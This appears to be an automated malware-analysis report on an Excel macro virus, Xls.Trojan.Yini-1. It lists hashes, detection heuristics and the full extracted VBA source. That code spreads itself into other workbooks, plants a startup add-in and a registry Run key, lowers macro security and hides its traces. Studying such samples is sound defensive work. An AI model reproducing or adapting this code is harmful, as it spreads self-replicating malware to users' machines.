Xls.Trojan.Yini-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 1403ff432466eeb0…

MALICIOUS

Office (OLE)

39.5 KB First seen: 2015-09-14
MD5: 000d91cadbc4290d8d6c00b42f624450 SHA-1: 8c2f5294c66040261400ba2d7c73b311024f377a SHA-256: 1403ff432466eeb043f36dac1f12902ecddc506a2379c24756b5e930094751f1
328 Risk Score

Malware Insights

Xls.Trojan.Yini-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample is an Excel file containing VBA macros that execute upon opening. The Workbook_Open subroutine attempts to create a VBScript file named 'yinyin3345.vbs' in the Excel startup path and potentially save a workbook as an add-in named 'yinyin3345.xls'. The script also contains logic for self-replication and AV tampering. This indicates an attempt to download and execute a second-stage payload and establish persistence.

Heuristics 8

  • ClamAV: Xls.Trojan.Yini-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Yini-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      Set WshShell = CreateObject("WScript.Shell")
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Target.DeleteLines 1, Source.CountOfLines
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Set Fso = CreateObject("scripting.filesystemobject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6592 bytes
SHA-256: a21d43761fc3bce9b061cdf8eaf77070a22f1cac3c7bfc8f23a0cd24a7f2464d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True





Option Explicit
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1




Private Const Darling As String = "yinyin3345.xls"
Private Const StartLove As String = "yinyin3345.vbs"
Private Const MYTEXT As String = "c:\windows\system\HappyBirthday"
Private Sub Workbook_Open()
  Dim DarlingPath As String
  Dim StartPath As String
  Dim DarlingBook As Workbook
  Dim Fullpath As String
  Dim ExistFlag
  On Error Resume Next
  Call Hide
  Call CreateFile
  StartPath = Application.StartupPath
  Fullpath = UCase$(StartPath + "\" + Darling)
  ExistFlag = Len(Dir$(Fullpath))
  
  If UCase$(Me.FullName) = Fullpath Then
    Set App = Application
  ElseIf (ExistFlag = 0) Then
    Application.ScreenUpdating = False
    If Len(Dir(StartPath, vbDirectory)) = 0 Then
       MkDir StartPath
    End If
    Set DarlingBook = Application.Workbooks.Add
    DarlingBook.IsAddin = True
    HurtWbk DarlingBook
    'DarlingBook.SaveAs Fullpath, xlNormal
    DarlingBook.SaveAs Fullpath, xlAddIn
    DarlingBook.Close
    Application.ScreenUpdating = True
  Else
  End If
End Sub
Private Sub App_WorkbookBeforeSave(ByVal Wbk As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
  On Error Resume Next
  HurtWbk Wbk
End Sub
Private Sub App_WorkbookBeforeClose(ByVal Wbk As Excel.Workbook, Cancel As Boolean)
  On Error Resume Next
  If Len(Wbk.Path) <> 0 Then
    If HurtWbk(Wbk) Then
      Wbk.Save
      Wbk.Saved = True
      
    End If
  End If
End Sub
Private Function HurtWbk(Wbk As Workbook) As Boolean
  Dim Source As Object
  Dim Target As Object
  Dim FindResult As Boolean
  On Error Resume Next
  HurtWbk = False
  Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
  Set Target = Wbk.VBProject.VBComponents("ThisWorkbook").CodeModule
  FindResult = Wbk.VBProject.VBComponents("ThisWorkBook").CodeModule.Find("yinyin3345.xls", 1, 1, 10, 30, False, False) '查看目标文件是否已带毒
  If FindResult = False Then
    Target.DeleteLines 1, Source.CountOfLines
    Target.AddFromString Source.Lines(1, Source.CountOfLines)
    
  End If
  
End Function

Sub Hide()
  Dim Con
  Dim WshShell
  Dim Fullpath As String
  Dim Fso
  Dim File
  Set Fso = CreateObject("scripting.filesystemobject")
  Set WshShell = CreateObject("WScript.Shell")
  On Error Resume Next
  For Each File In Application.RecentFiles
     If InStr(File.Name, "yinyin3345.xls") > 0 Then
        Fso.deletefile File.Path
     End If
  Next File
  On Error Resume Next
  Fullpath = WshShell.SpecialFolders("recent") & "\yinyin~1.lnk"
  If Len(Dir$(Fullpath)) > 0 Then
    Fso.deletefile Fullpath
  End If
  Fullpath = WshShell.SpecialFolders("Templates") & "\Software\yinyin3345.vbs"
  WshShell.regwrite "HKCU\Software\Microsoft\Office\9.0\excel\Security\Level", 1, "REG_DWORD"
  WshShell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\internet.exe", Fullpath
  On Error Resume Next
  For Each Con In Application.CommandBars("tools").Controls
    If Left$(Con.Caption, 1) = "宏" Then
      Con.Enabled = False
      Exit For
    End If
  Next Con
  On Error Resume Next
  For Each Con In Application.CommandBars("macro").Controls
    Con.Enabled = False
    Con.Visible = False
  Next Con
End Sub

Sub CreateFile()
  Dim Fso, Source
  Dim Wsh
  Dim Myfolder
  Dim FileName, i, Text
  Set Fso = CreateObject("scripting.filesystemobject")
  Set Wsh = CreateObject("wscript.shell")
  Myfolder = Wsh.SpecialFolders("Templates") & "\Software\"
  Set Source = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
  If Not Fso.folderexists(Myfolder) Then
    Fso.createfolder Myfolder
  End If
  FileName = Myfolder & StartLove
  Open FileName For Output As #1
  Print #1, "Dim Fso,Wsh,Cell,myBook,MyText"
  Print #1, "Set Fso = CreateObject(" & Chr(34) & "scripting.filesystemobject"; Chr(34); ")"
  Print #1, "Set wsh = CreateObject(" & Chr(34) & "wscript.shell"; Chr(34); ")"
  Print #1, "Set cell = CreateObject(" & Chr(34) & "excel.application" & Chr(34) & ")"
  Print #1, "if Fso.fileexists(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & ") = false then"
  Print #1, "Set Mybook = cell.Workbooks.Add"
  Print #1, "Mybook.IsAddin = True"
  Print #1, "Mybook.VBProject.VBComponents(" & Chr(34) & "ThisWorkbook" & Chr(34) & ").CodeModule.addfromfile " & Chr(34) & "c:\windows\system\happybirthday" & Chr(34)
  Print #1, "Mybook.SaveAs UCase(cell.StartupPath + " & Chr(34) & "\yinyin3345.xls" & Chr(34) & "), 18"
  Print #1, "Mybook.Close"
  Print #1, "Set cell = Nothing"
  Print #1, "end if"
  Print #1, "If Month(Date) = 11 And Day(Date) = 4 Then"
  Print #1, "MsgBox " & Chr(34) & "祝MS.YINYIN3345小姐和MR.myfrien4061生日快乐!!!!!!!!" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34)
  Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") &  " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34)
  Print #1, "elseif weekday(date)= 5 then"
  Print #1, "MsgBox " & Chr(34) & "您的电脑如果出现不能上网的问题,请和系统管理员联系。" & Chr(34) & ", vbOKOnly," & Chr(34) & "YINYIN3345友情提示" & Chr(34)
  Print #1, "Fso.deletefile wsh.specialfolders(" & Chr(34) & "Templates" & Chr(34) & ") &  " & Chr(34) & "\software\yinyin3345.vbs" & Chr(34)
  Print #1, "else"
  Print #1, "end if"
  Print #1, "set fso = nothing"
  Print #1, "set wsh = nothing"
  Close #1
  Open MYTEXT For Output As #1
  Print #1, Source.Lines(1, Source.CountOfLines)
  Close #1
  Set Source = Nothing
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True